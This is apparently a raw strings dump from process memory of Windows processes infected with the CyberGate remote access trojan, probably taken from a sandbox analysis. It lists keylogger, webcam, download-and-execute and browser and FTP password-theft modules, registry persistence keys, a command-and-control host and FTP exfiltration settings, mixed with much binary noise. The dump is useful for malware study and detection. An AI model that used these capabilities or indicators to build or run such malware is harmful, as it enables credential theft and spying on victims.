Can't open %s
Could not find the main class: %s. Program will exit.
Failed to load Main Class: %s
Could not find the main class: %s. Program will exit.
argv[-] = '%s'
Apps' argc is %d
Main-Class is '%s'
Warning: %s VM not supported; %s VM will be used
Error: %s VM not supported
Error: Unable to resolve VM alias %s
Error: Corrupt jvm.cfg file; cycle in alias list.
Default VM: %s
%s requires class path specification
%s full version "%s"
Warning: %s option is no longer supported.
-Xrunhprof:cpu=old,file=java.prof
-Xrunhprof:cpu=old,file=%s
%ld micro seconds to parse jvm.cfg
name: %s vmType: %s alias: %s
name: %s vmType: %s server_class: %s
jvm.cfg[%d] = ->%s<-
Warning: unknown VM type on line %d of `%s'
Warning: missing server class VM on line %d of `%s'
Warning: missing VM alias on line %d of `%s'
Warning: missing VM type on line %d of `%s'
Warning: no leading - on line %d of `%s'
Error: could not open `%s'
\jvm.cfg
\bin\splashscreen.dll
%s\jvm.dll
%s\bin\%s\jvm.dll
Version major.minor.micro = %s.%s
Failed reading value of registry key:
Software\JavaSoft\Java Runtime Environment\%s\JavaHome
Error opening registry key 'Software\JavaSoft\Java Runtime Environment\%s'
Registry key 'Software\JavaSoft\Java Runtime Environment\CurrentVersion'
has value '%s', but '1.6' is required.
Error opening registry key 'Software\JavaSoft\Java Runtime Environment'
-Dsun.java2d.opengl
-Dsun.java2d.d3d
-Dsun.java2d.noddraw
-Dsun.awt.warmup
Unable to resolve path to current %s executable: %s
CreateProcess(%s, ...) failed: %s
ReExec Args: %s
ReExec Command: %s (%s)
ExecJRE: new: %s
ExecJRE: old: %s
Error: could not find java.dll
JRE path is %s
%s\jre\bin\java.dll
%s\bin\java.dll
Error loading: %s
CRT path is %s
\bin\msvcr71.dll
EnsureJreInstallation:%s:load failed
\bin\jkernel.dll
EnsureJreInstallation:<%s>:not found
EnsureJreInstallation:unsupported platform
Error: can't find JNI interfaces in: %s
JVM path is %s
\bin\awt.dll
\bin\java.dll
\bin\verify.dll
Error: no `%s' JVM at `%s'.
Error: no known VMs. (check for corrupt jvm.cfg file)
before: "%s"
after : "%s"
META-INF/MANIFEST.MF
1.1.3
inflate 1.1.3 Copyright 1995-1998 Mark Adler
mscoree.dll
Broken pipe
Inappropriate I/O control operation
Operation not permitted
kernel32.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
C:\BUILD_~1\jdk6_18\control\build\WINDOW~1\tmp\java\javaw\obj\javaw.pdb
RegCloseKey
RegOpenKeyExA
RegEnumKeyA
ADVAPI32.dll
USER32.dll
GetCPInfo
KERNEL32.dll
%Program Files%\Java\jre6\bin\javaw.exe
name="javaw.exe"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
3333333333330
333333333307
PP%d(jjjjj
6.0.180.7
javaw.exe

javaw.exe_680_rwx_00B70000_00218000:




\$`#\$\3
8&
\$` \$,;

svchost.exe_1592:




.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512

svchost.exe_1592_rwx_00400000_0006F000:




.idata
.rdata
P.reloc
P.rsrc
Portions Copyright (c) 1999,2003 Avenger by NhT
kernel32.dll
Kernel32.dll
ntdll.dll
789:;<&'()* ,-./12345
user32.dll
advapi32.dll
shell32.dll
shlwapi.dll
urlmon.dll
wininet.dll
Shell32.dll
lsass.exe
svchost.exe
GetProcessHeap
oleaut32.dll
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyW
RegCloseKey
GetWindowsDirectoryW
UnhookWindowsHookEx
SetWindowsHookExW
MapVirtualKeyW
GetKeyboardLayout
GetKeyState
SHDeleteKeyW
FindExecutableW
ShellExecuteW
URLDownloadToFileW
DeleteUrlCacheEntryW
GetKeyboardState
FtpPutFileW
FtpSetCurrentDirectoryW
1 1$1(1,1
S#t%dL
].hMIo
Qp.XQ5
*vjE%F
.Asj`
dT.Kv
Û7U
EsSh`V
ST%uM
%Cz)e
1]o:%d
3.nMXg
--9b}%
TcPD
%2uBa
%\K.TW
1uWkpb.nO
;.LT7
^0.BN!f`' _
.M.FQ
).sJ8
^D.SJ
yn.MQ
=js%C
.Qi/@
j.mcT
k.Am7
B^.mM:Gd
~1.ZRGY#%
vvH<
KWindows
Cm_Keylogger
x.html
explorer.exe
%USECRYPTERSETTINGS%
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
BINDERPASS
[Execute]
KeyDelBackspace
CyberGateKeylogger
explorer.exe
http://
.functions
ÞFAULTBROWSER%
%USECRYPTER%
SETTINGSPASS
\Microsoft\Windows\
CYBERGATEPASS
lala25.no-ip.biz
C:\User
InstallDir.exe
2.5.2.0
ftp.ftpserver.com
ftpuser
ftppass
Then set URL here.
calc.exe
notepad.exe
http://www.somehosting.com/tagger.php
::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}
::{031E4825-7B94-4dc3-B131-E946B44C8DD5}\{491E922F-5643-4af4-A7EB-4E7A138D8174}
::{59031a4?id=%ID%&name=%Username% @ %PCName%&version=%Version%
[email protected]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo

iexplore.exe_3128:




`.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EIdCanNotBindPortInRange
EIdInvalidPortRange\wc
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStreamVCL.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdGlobal.pas
WS2_32.DLL
MSWSOCK.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
TIdSocketListWindows
TIdStackWindowsU
Kernel32.dll
EIdIPVersionUnsupportedP
127.0.0.1
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStack.pas
EIdPortRequired
EIdTCPConnectionError
EIdObjectTypeNotSupported
ftpTransfer
ftpReady
ftpAborted
PortT
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandler.pas
ClientPortMin
ClientPortMax
Port|
"EIdTransparentProxyUDPNotSupported
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandlerStack.pas
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
Password
PortD
0.0.0.1
0.0.0.0
BoundPort
DefaultPortD
TIdTCPConnection
TIdTCPConnectionX
IdTCPConnection
TIdTCPClientCustom
IdTCPClient
TIdTCPClient
TIdTCPClientH
BoundPortT
ole32.dll
EInvalidGraphicOperation
Please contact Cyber-Software support
shlwapi.dll
WbemScripting.SWbemLocator
%s\%s
SELECT * FROM %s
pathToSignedProductExe
pathToSignedReportingExe
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
OnKeyDown46g
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
TWebcam
SetupApi.dll
SetupDiOpenClassRegKey
SetupDiOpenClassRegKeyExA
SetupDiOpenClassRegKeyExW
SetupDiCreateDeviceInterfaceRegKeyA
SetupDiCreateDeviceInterfaceRegKeyW
SetupDiOpenDeviceInterfaceRegKey
SetupDiDeleteDeviceInterfaceRegKey
SetupDiCreateDevRegKeyA
SetupDiCreateDevRegKeyW
SetupDiOpenDevRegKey
SetupDiDeleteDevRegKey
CM_DEVCAP_LOCKSUPPORTED
CM_DEVCAP_EJECTSUPPORTED
PDCAP_D0_SUPPORTED
PDCAP_D1_SUPPORTED
PDCAP_D2_SUPPORTED
PDCAP_D3_SUPPORTED
PDCAP_WAKE_FROM_D0_SUPPORTED
PDCAP_WAKE_FROM_D1_SUPPORTED
PDCAP_WAKE_FROM_D2_SUPPORTED
PDCAP_WAKE_FROM_D3_SUPPORTED
PDCAP_WARM_EJECT_SUPPORTED
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
HTTP-EQUIV
()<>@,;:\"./
()<>@,;:\"/[]?=
()<>@,;:\"/[]?={}
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdThread.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdScheduler.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdServerIOHandlerSocket.pas
EIdTCPNoOnExecute
TIdTCPServer
TIdTCPServerX
IdTCPServer
OnExecute
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdSchedulerOfThread.pas
%s User
IdCustomTCPServer
TIdCustomTCPServer
DefaultPort
EIdTCPServerError
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCustomTCPServer.pas
CmdDelimiter
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCommandHandlers.pas
'TIdCmdTCPServerAfterCommandHandlerEvent
TIdCmdTCPServer
(TIdCmdTCPServerBeforeCommandHandlerEvent
IdCmdTCPServer
Displays commands that the servers supports.
TIdTCPStream
IdRead() method of TIdTCPStream class does not support seeking
TIdHTTPProxyTransferMode
TIdHTTPProxyServerContextt
TIdHTTPProxyServerContext$
TOnHTTPContextEvent
TIdHTTPProxyServerContext
TOnHTTPDocument
TIdHTTPProxyServer
OnHTTPBeforeCommand
OnHTTPResponse
OnHTTPDocument
HTTP/1.0
HTTP/1.0 200 Connection established
HNetCfg.FwMgr
HNetCfg.FwAuthorizedApplication
PSAPI.dll
TWebcamThread
Uh.Uk
789:;<&'()* ,-./12345
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
AllocateAndGetUdpExTableFromStack
SetTcpEntry
GetExtendedTcpTable
GetExtendedUdpTable
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
TSendKey
sqlite3_bind_blob
sqlite3_bind_text
sqlite3_bind_double
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_parameter_index
sqlite3_open
sqlite3_close
sqlite3_errmsg
sqlite3_free
sqlite3_prepare_v2
sqlite3_column_count
sqlite3_column_name
sqlite3_column_decltype
sqlite3_step
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_double
sqlite3_column_text
sqlite3_column_type
sqlite3_column_int64
sqlite3_finalize
sqlite3_reset
ESQLiteException
TSQLiteDatabaseD
TSQLiteTable
Failed to open database "%s" : %s
Failed to open database "%s" : unknown error
Error executing SQL
Could not prepare SQL statement
Error executing SQL statement
SQLite is Busy
SOFTWARE\Mozilla\Mozilla Firefox
SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox
SOFTWARE\Mozilla\Mozilla Firefox\
SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
1234567890.
mozsqlite3.dll
sqlite3.dll
mozcrt19.dll
msvcr100.dll
mozglue.dll
mozutils.dll
nspr4.dll
plc4.dll
plds4.dll
nssutil3.dll
nss3.dll
PK11_GetInternalKeySlot
\Mozilla\Firefox\profiles.ini
\Mozilla\Firefox\
signons.sqlite
SELECT * FROM moz_logins
encryptedPassword
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
RAS Passwords
SOFTWARE\Microsoft\Windows\CurrentVersion
Ps_Passwords
advapi32.dll
WindowsLive:name=*
\Mozilla Firefox\
MSVCR100.dll
softokn3.dll
userenv.dll
profiles.ini
\signons3.txt
\signons2.txt
\signons1.txt
\signons.txt
ps_SafariPasswordRecovery
AVURLProtocol_Classic
\Apple Computer\Preferences\keychain.plist
\Apple\Apple Application Support\CFNetwork.dll
http://
ftp://
*ftp://
https://
Shell.Application
http://cyber-sec.org/email/asp/email.php?email=
TMemoryOperation
%sysdir%\
%serverpath%\
%sysdir%
%serverpath%
Proxy Bypass
ntdll.dll
TPasswordItem
TArrayPasswod
Crypt32.dll
shell32.dll
Advapi32.dll
SOFTWARE\MOZILLA\MOZILLA FIREFOX
SOFTWARE\MOZILLA\MOZILLA FIREFOX\version.dll\Main
select * from moz_logins
Firefox
SOFTWARE\MOZILLA\MOZILLA FIREFOX\
\Flock\Browser\profiles.ini
Flock-Firefox
\1-abc\personal calendar\sqlite3.dll
\clipdiary\sqlite3.dll
\conceptworld\recentx\sqlite3.dll
\darq software\transmute\sqlite3.dll
\delphish\sqlite3.dll
\ditto\sqlite3.dll
\du meter\sqlite3.dll
\fcleaner\sqlite3.dll
\file seeker\sqlite3.dll
\flashnote\sqlite3.dll
\flashpaste\sqlite3.dll
\gorecord\sqlite3.dll
\gorecord2\sqlite3.dll
\linkcollector portable\sqlite3.dll
\ma-config.com\sqlite3.dll
\macrovirus\sqlite3.dll
\msnsniffer2\sqlite3.dll
\notecable\sqlite3.dll
\nzbleecher\sqlite3.dll
\outlook express\sqlite3.dll
\page update watcher\sqlite3.dll
\pipi\sqlite3.dll
\qloud\sqlite3.dll
\qloud\winamp\sqlite3.dll
\qloud\windows media player\sqlite3.dll
\recordtheradio\sqlite3.dll
\rightload\sqlite3.dll
\smm\funny sms10\sqlite3.dll
\smm\simple mail 7\sqlite3.dll
\spiceworks\bin\sqlite3.dll
\spyware-secure\sqlite3.dll
\timelog\sqlite3.dll
\video2webcam\sqlite3.dll
\webmarkers\sqlite3.dll
\webmediaplayer\sqlite3.dll
\windows media player\plugins\qloud\sqlite3.dll
\Mozilla Firefox\sqlite3.dll
\VirusGuardPlus\sqlite3.dll
\Safari\sqlite3.dll
\AIMP2\sqlite3.dll
\Live-Player\sqlite3.dll
\TrustedProtection\sqlite3.dll
\PCTotalDefender\sqlite3.dll
\Common Files\eEye Digital Security\Application Bus\sqlite3.dll
Windows Live Messenger
DynDNS\Updater\config.dyndns
Password=
Software\DownloadManager\Passwords
Software\DownloadManager\Passwords\
EncPassword
YLoginWnd
FileZilla\recentservers.xml
FileZilla\sitemanager.xml
FileZilla\filezilla.xml
.purple\accounts.xml
abe2869f-9b47-4cd9-a358-c22904dba7f7
trillian.ini
accounts.ini
password
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian
Trillian\trillian.exe
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
###@@@!!!
IMAP Password
IMAP Password:
POP3 Password
POP3 Password:
HNetCfg.NATUPnP
StaticPortMappingCollection
Uh%Fm
TCpuUsageU
##,##0.00
TNewFTPThreadU
TPasswordU
SHFileOperationW
.hd'n
.hd*n
%s %s
Windows NT %d.%d
%s %s Server
Unknown Platform ID (%d)
%d.%d
%s [Build: %d
- Service Pack: %s
KERNEL32.DLL
TIdTCPClientNewp
TIdTCPClientNew
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
?456789:;<=
!"#$%&'()* ,-./0123
com.apple.Safari
com.apple.Safari0123456789ABCDEF
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
IdStackWindows
Sr_StartWebcam
UrlMon
UnitWebcamAPI
IdTCPStream
 IdTCPServer
Sr_Windows
Cm_Keylogger
~Sr_Ports
}Unitsndkey32
Vps_FireFox3_5
SQLiteTable3
SQLite3
Ps_IEpasswords
ps_URLHistory
FPs_PasswordRecovery
Ps_OperaPasswords
Sr_MemoryEXE
Sr_MemoryExecuteFunctions
U_GrabFirefox10
YU_GrabFirefox8
6U_GrabFirefox
\U_GrabChrome
U_GrabFirefox15
U_Grabfirefox22
{IdCmdTCPClient
SetNamedPipeHandleState
GetWindowsDirectoryW
GetProcessHeap
GetCPInfo
CreatePipe
RegQueryInfoKeyA
RegOpenKeyExW
RegOpenKeyExA
RegOpenKeyW
RegOpenKeyA
RegFlushKey
RegEnumKeyExW
RegEnumKeyExA
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyW
RegCloseKey
CryptImportKey
CryptSetKeyParam
CryptDestroyKey
SetViewportOrgEx
GdiplusShutdown
ShellExecuteW
FindExecutableW
SHDeleteKeyW
URLDownloadToFileW
keybd_event
VkKeyScanW
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExA
SetKeyboardState
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
ExitWindowsEx
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetKeyboardType
FtpPutFileW
FtpSetCurrentDirectoryW
InternetOpenUrlW
InternetOpenUrlA
HttpQueryInfoA
.idata
.rdata
P.reloc
P.rsrc
[E.MyFull
-!GA?EXE
LMsg
AVICAP32.DLL
crypt32.dll
gdi32.dll
gdiplus.dll
mpr.dll
msacm32.dll
powrprof.dll
pstorec.dll
URLMON.DLL
user32.dll
version.dll
wininet.dll
winmm.dll
wsock32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
Portugal
Turkey
WEBCAM
*<>#%"{}|\^[]`
uploadandexecute
uploadandexecuteyes|
uploadandexecuteno|
webcam|webcamstream|
webcam|webcamstop|
webcamstart
[Execute]
KeyDelBackspace
CyberGateKeylogger
software\microsoft\windows\currentversion\uninstall\
Invalid Key Name
Invalid KeyName
%Username%
%Country%
Úte%
FirstExecution
keylogger|keyloggeronlinekey|
keylogger|keyloggerativar|T|
keylogger|keyloggerativar|F|
webcamlist|
webcam
filemanager|fmsendftpyes|
filemanager|fmsendftpno|
FIREFOX2|
FIREFOX8|
FIREFOX10|
FIREFOX15|
FIREFOX22|
\Opera\Opera\wand.dat
OPERA|
\Google\Chrome\User Data\Default\Login Data
CHROME|
\Google\Chrome\User Data\Default\Web Data
getpasswords
downexec
openweb
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\
fmexecnormal
filemanager|fmexecnormal|
fmexechide
filemanager|fmexechide|
fmexecparam
filemanager|fmexecparam|F|
filemanager|fmexecparam|T|
fmsendftp
filemanager|fmsendftp|
listarportas
listarportas|listadeportasativas|
listarportasdns
listarportas|finalizarconexao|
finalizarprocessoportas
listarportas|finalizarprocessoportas|Y|
listarportas|finalizarprocessoportas|N|
tecaladoexecutar
webcamconfig
keylogger
keylogger|keyloggeronlinestart|
keylogger|keyloggeronlinestop|
keyloggerativar
keyloggerdesativar
keyloggerbaixar
keylogger|keyloggerbaixar|
keylogger|keyloggerbaixar|NOLOGS
keyloggerexcluir
keylogger|keyloggerexcluir|
keyloggeronlinestart
keyloggeronlinestop
chromepass
chromepass|
keysearch
keysearch|NO
keysearch|YES
sendkeyswindow
enviarlogskey
enviarlogskey|
rar.exe
rarreg.key
vs.vbs
bs.bat
memoryexecoperation
TeamViewer.exe
TeamViewer_Resource.dll
TV.dll
x.html
Windows 3.1
Windows 95 (Release 2)
Windows 95
Windows 98 SE
Windows 98
Windows ME
Windows 8
Windows 7
Windows Vista
Windows XP Professional x64
Windows XP Home
Windows XP Professional
Windows 2000 Professional
Windows 2008
Windows 2003 Server Datacenter
Windows 2003 Server Enterprise
Windows 2003 Server Web Edition
Windows 2003 Server
Windows Home Server
Windows 2003 Server (Release 2)
Windows 2000 Server Datacenter
Windows 2000 Server Enterprise
Windows 2000 Server Web Edition
Windows 2000 Server
Windows NT 4.0 Server Datacenter
Windows NT 4.0 Server Enterprise
Windows NT 4.0 Server Web Edition
Windows NT 4.0 Server
SelfDelete.bat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows NT\CurrentVersion\Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
explorer.exe
\Microsoft\Windows\
CYBERGATEPASS
lala25.no-ip.biz
C:\User
InstallDir.exe
ÞFAULTBROWSER%
2.5.2.0
ftp.ftpserver.com
ftpuser
ftppass
Then set URL here.
calc.exe
notepad.exe
lsass.exe
explorer.exe
svchost.exe
http://www.somehosting.com/tagger.php
::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}
::{031E4825-7B94-4dc3-B131-E946B44C8DD5}\{491E922F-5643-4af4-A7EB-4E7A138D8174}
::{59031a4?id=%ID%&name=%Username% @ %PCName%&version=%Version%
[email protected]
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code already exists: %s Thread must be specified for the scheduler.!You must have an OnExecute event.
Command not supported.
Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
Object type not supported.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
%s is not a valid service.
"Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported.
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid codepage (%d)-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Socket Error # %d
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d
Integer overflow Invalid floating point operation

iexplore.exe_3128_rwx_01611000_0010D000:




kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EIdCanNotBindPortInRange
EIdInvalidPortRange\wc
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStreamVCL.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdGlobal.pas
WS2_32.DLL
MSWSOCK.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
TIdSocketListWindows
TIdStackWindowsU
Kernel32.dll
EIdIPVersionUnsupportedP
127.0.0.1
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStack.pas
EIdPortRequired
EIdTCPConnectionError
EIdObjectTypeNotSupported
ftpTransfer
ftpReady
ftpAborted
PortT
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandler.pas
ClientPortMin
ClientPortMax
Port|
"EIdTransparentProxyUDPNotSupported
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandlerStack.pas
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
Password
PortD
0.0.0.1
0.0.0.0
BoundPort
DefaultPortD
TIdTCPConnection
TIdTCPConnectionX
IdTCPConnection
TIdTCPClientCustom
IdTCPClient
TIdTCPClient
TIdTCPClientH
BoundPortT
ole32.dll
EInvalidGraphicOperation
Please contact Cyber-Software support
shlwapi.dll
WbemScripting.SWbemLocator
%s\%s
SELECT * FROM %s
pathToSignedProductExe
pathToSignedReportingExe
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
OnKeyDown46g
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
TWebcam
SetupApi.dll
SetupDiOpenClassRegKey
SetupDiOpenClassRegKeyExA
SetupDiOpenClassRegKeyExW
SetupDiCreateDeviceInterfaceRegKeyA
SetupDiCreateDeviceInterfaceRegKeyW
SetupDiOpenDeviceInterfaceRegKey
SetupDiDeleteDeviceInterfaceRegKey
SetupDiCreateDevRegKeyA
SetupDiCreateDevRegKeyW
SetupDiOpenDevRegKey
SetupDiDeleteDevRegKey
CM_DEVCAP_LOCKSUPPORTED
CM_DEVCAP_EJECTSUPPORTED
PDCAP_D0_SUPPORTED
PDCAP_D1_SUPPORTED
PDCAP_D2_SUPPORTED
PDCAP_D3_SUPPORTED
PDCAP_WAKE_FROM_D0_SUPPORTED
PDCAP_WAKE_FROM_D1_SUPPORTED
PDCAP_WAKE_FROM_D2_SUPPORTED
PDCAP_WAKE_FROM_D3_SUPPORTED
PDCAP_WARM_EJECT_SUPPORTED
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
